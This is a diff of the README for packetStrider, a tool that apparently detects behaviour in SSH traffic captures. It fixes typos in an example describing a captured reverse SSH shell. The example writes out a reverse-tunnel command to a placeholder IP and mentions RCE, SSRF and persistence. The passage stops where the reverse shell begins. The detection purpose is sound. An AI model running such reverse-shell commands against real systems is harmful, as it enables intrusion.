benjeems/packetStrider/README.md

 ## Example
 The pcap "forward_reverse.pcap" is from a common TTP of a Reverse SSH shell, a favorite of red teams everywhere.
 Specifically the following commands were used, to highlight the capabilities of packet strider in a simple way:
 - Forward connection from victim
     - The command for the forward session was `ssh user@1.2.3.4 -R 31337:localhost:22` which binds local port 31337 ready for the reverse SSH connection back to the victim PC.
 This connection can be effected in many ways including manually, by an RCE, SSRF, or some form of persistence.
-For the purpose if this demo, it is a manual standard forward session.
+For the purpose of this demo, it is a manual standard forward session.
     - This was NOT the first time the client has seen the server , we see this because the delta for related packets was very small , the server's key fingerprint was already in the client's known_hosts, so the user was not prompted to add it - which would increase the latency of packets.
-   - Two consecutive failed password logins by human, followed by a successful login with an 8+ character password.
+   - Two consecutive failed password logins by a human, followed by a successful login with an 8+ character password.
    - `ls` is typed in forward session, in this sequence: **'l'** 'w' 'w' 'back-space' 'back-space' **'s'** and then enter.
 The total size of data over the wire that is transmitted (as the output of ls) is classified as infiltration, given that is inbound.

 - Now on the attacker's machine (the server), a reverse shell is initiated back to the victim: